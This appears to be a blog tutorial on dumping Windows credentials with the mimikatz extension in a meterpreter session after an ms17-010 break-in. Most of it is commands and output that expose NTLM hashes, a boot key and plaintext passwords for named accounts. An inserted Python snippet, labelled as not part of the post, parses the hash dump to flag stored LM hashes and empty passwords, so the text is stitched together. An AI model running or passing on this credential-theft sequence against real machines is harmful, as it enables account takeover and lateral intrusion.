I won't go into Kali here, and I'll skip meterpreter too; this is a note about mimikatz.
The mimikatz module can obtain the passwords on the target machine (both hashes and plaintext).
I also won't cover how the exploit module got in, since there are too many ways; I used ms17-010.
Once inside meterpreter, run getuid (it isn't much use otherwise; Jun-ge says that in meterpreter mode you usually already hold SYSTEM privileges and don't need getsystem, but hosts with strict privilege management may differ).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
This shows we have system administrator privileges.
Load the mimikatz module
meterpreter > load mimikatz
Loading extension mimikatz...Success.
Loaded successfully.
Get the hash of the logon password
meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID     Package    Domain        User           Password
------     -------    ------        ----           --------
0;334101   NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;334068   NTLM       chenglee-PC   chenglee       lm{ 9cffd5e7eefa14babacbf0b4adf55fde }, ntlm{ 8d0f8e1a18236379538411a9056799f5 }
0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996      Negotiate  WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
0;49101    NTLM                                    n.s. (Credentials KO)
0;999      NTLM       WORKGROUP     CHENGLEE-PC$   n.s. (Credentials KO)
The hashes have been obtained above. Next, work out the plaintext password.
Get the plaintext password
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID     Package    Domain        User           Password
------     -------    ------        ----           --------
0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996      Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101    NTLM
0;999      NTLM       WORKGROUP     CHENGLEE-PC$
0;334101   NTLM       chenglee-PC   chenglee       lizhenghua
0;334068   NTLM       chenglee-PC   chenglee       lizhenghua
Look... we have the plaintext logon password.
There are some special cases, though, like this one:
meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID      Package    Domain        User           Password
------      -------    ------        ----           --------
0;10408969  NTLM       CLOUDVM       Administrator
0;266228    NTLM       CLOUDVM       Administrator
0;997       Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996       Negotiate  WORKGROUP     CLOUDVM$
0;23595     NTLM
0;999       NTLM       WORKGROUP     CLOUDVM$
Huh, what is this... not even the hash can be obtained.
No problem, move on to the next step:
Get the hashes another way
meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : chenglee-PC
BootKey    : 0648ced51b6060bed1a3654e0ee0fd93

Rid  : 500
User : Administrator
LM   :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   :
NTLM :

Rid  : 1000
User : chenglee
LM   :
NTLM : 8d0f8e1a18236379538411a9056799f5
OK, got them.
Get the plaintext password in the same way as above
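As an added example (not from the post), a small Python checker that parses samdump::hashes output in the layout shown above and reports what the stored hashes reveal: a non-empty LM field means LM hash storage is still enabled on the host, and an NT hash of 31d6cfe0d16ae931b73c59d7e0c089c0 is the hash of an empty password. The sample input is the post's own output embedded as a constructed string; the field names and layout are assumed from that output.

```python
import re
# NT hash of the empty password (MD4 of an empty UTF-16LE string); a well-known constant.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed sample: the samdump::hashes output shown in this post, in the same layout.
SAMPLE = """\
Ordinateur : chenglee-PC
BootKey : 0648ced51b6060bed1a3654e0ee0fd93
Rid : 500
User : Administrator
LM :
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0
Rid : 501
User : Guest
LM :
NTLM :
Rid : 1000
User : chenglee
LM :
NTLM : 8d0f8e1a18236379538411a9056799f5
"""
def parse_samdump(text):
    """Return one {rid, user, lm, ntlm} dict per account block, in file order."""
    accounts, current = [], None
    for line in text.splitlines():
        m = re.match(r"^(Rid|User|LM|NTLM)\s*:\s*(.*)$", line.strip())
        if not m:
            continue  # "Ordinateur"/"BootKey" header lines and blanks are skipped
        key, value = m.group(1).lower(), m.group(2).strip()
        if key == "rid":
            current = {"rid": int(value), "user": "", "lm": "", "ntlm": ""}
            accounts.append(current)
        elif current is not None:
            current[key] = value if key == "user" else value.lower()
    return accounts

def audit(accounts):
    """Map each user name to the weaknesses its stored hashes reveal."""
    findings = {}
    for a in accounts:
        issues = []
        if a["lm"]:
            issues.append("LM hash stored")    # LM storage should be off (NoLMHash policy)
        if a["ntlm"] == EMPTY_NT_HASH:
            issues.append("empty password")    # equals the NT hash of a blank password
        if not a["ntlm"] and not a["lm"]:
            issues.append("no NT hash stored")
        findings[a["user"]] = issues
    return findings
```

The same two checks apply to the msv table earlier in the post, where the lm{ ... } field for chenglee is non-empty for the same reason.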
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { chenglee ; chenglee-PC ; lizhenghua }
[1] { chenglee ; chenglee-PC ; lizhenghua }
[2] { chenglee ; chenglee-PC ; lizhenghua }
[3] { chenglee ; chenglee-PC ; lizhenghua }
[4] { chenglee-PC ; chenglee ; lizhenghua }
[5] { chenglee-PC ; chenglee ; lizhenghua }
meterpreter >
meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { Administrator ; CLOUDVM ; 1244567 }
[1] { Administrator ; CLOUDVM ; 1244567 }
Got them all.
One more thing: a more concise way is the wdigest command.
This command isn't as involved as the steps above; after loading the module, just call wdigest directly.
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID     Package    Domain        User           Password
------     -------    ------        ----           --------
0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996      Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101    NTLM
0;999      NTLM       WORKGROUP     CHENGLEE-PC$
0;334101   NTLM       chenglee-PC   chenglee       lizhenghua
0;334068   NTLM       chenglee-PC   chenglee       lizhenghua
Another one just as powerful as wdigest is tspkg.
meterpreter > tspkg
[+] Running as SYSTEM
[*] Retrieving tspkg credentials
tspkg credentials
=================

AuthID     Package    Domain        User           Password
------     -------    ------        ----           --------
0;997      Negotiate  NT AUTHORITY  LOCAL SERVICE
0;996      Negotiate  WORKGROUP     CHENGLEE-PC$
0;49101    NTLM
0;999      NTLM       WORKGROUP     CHENGLEE-PC$
0;334101   NTLM       chenglee-PC   chenglee       lizhenghua
0;334068   NTLM       chenglee-PC   chenglee       lizhenghua
One shot, one kill, isn't it...